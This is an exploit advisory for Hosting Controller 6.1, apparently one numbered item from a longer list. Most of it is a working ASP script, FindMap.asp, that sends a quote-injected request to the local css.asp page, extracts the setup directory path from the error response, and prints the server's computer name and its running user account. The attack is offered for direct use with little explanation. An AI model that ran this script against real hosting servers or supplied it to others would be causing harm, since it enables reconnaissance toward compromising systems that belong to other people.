EXPLOIT : Hosting Controller 6.1 - Users can find Hosting Controller setup directory.

11- [User] can find Hosting Controller setup directory.
 11.1- This exploit run locally so the url is like: "http://localhost:8077/hosting/css.asp?AutoHost=resadmin'"
 11.2- To see it locally you can use "FindMap.asp"
            ~~~~~~~~~~~~~~~~11.2.1 FindMap.asp~~~~~~~~~~~~~~~~~~~~~~~~
                <%@LANGUAGE="VBSCRIPT" CODEPAGE="1252"%>
                <%
                Check = 1 ' Change to 1,2,3,4 if you can't get the proper answer
                
                If Check =1 then
                '------------------------------------------------------------------------- 
                    Set xml = Server.CreateObject("Microsoft.XMLHTTP")
                    xml.Open "Get", "http://127.0.0.1:8077/hosting/css.asp?AutoHost=resadmin'", False
                '------------------------------------------------------------------------- 
                ElseIf Check =2 Then
                '------------------------------------------------------------------------- 
                    Set xml = Server.CreateObject("Microsoft.XMLHTTP")
                    xml.Open "Get", "http://localhost:8077/hosting/css.asp?AutoHost=resadmin'", False
                '-------------------------------------------------------------------------
                ElseIf Check =3 Then
                '------------------------------------------------------------------------- 
                    Set xml = Server.CreateObject("MSXML2.XMLHTTP")
                    xml.Open "Get", "http://127.0.0.1:8077/hosting/css.asp?AutoHost=resadmin'", False
                '-------------------------------------------------------------------------
                ElseIf Check =4 Then
                '------------------------------------------------------------------------- 
                    Set xml = Server.CreateObject("MSXML2.XMLHTTP")
                    xml.Open "Get", "http://localhost:8077/hosting/css.asp?AutoHost=resadmin'", False
                '-------------------------------------------------------------------------
                End If
                
                xml.setRequestHeader "lastCached", now()
                xml.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
                xml.Send TotalInputPOST
                FileContent = xml.getResponseHeader("Content-Type")
                strHtmlContent = xml.responseText
                i = instrrev(strHtmlContent,"../common/SqlInject.asp")
                j = instrrev(strHtmlContent,"size=2>",i)
                Response.Write("<b>"&mid(strHtmlContent,j+7,i-j-15)&"</b>")
                %>
                <%set oScriptNet=Server.CreateObject("Wscript.Network")%>
                <br />
                <pre>
                Computer Name: <%=oScriptNet.ComputerName%>
                User: <%=oScriptNet.UserName%>   (You are seeing this page by this user)
                Both: \\<%=oScriptNet.ComputerName%>\\<%=oScriptNet.UserName%>
                User Length=<%If Len(oScriptNet.UserName)<=20 Then Response.Write(" OK :)") Else Response.Write(" False :( More than 20 chars so you must use from other username like ASPNET")%></pre>
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~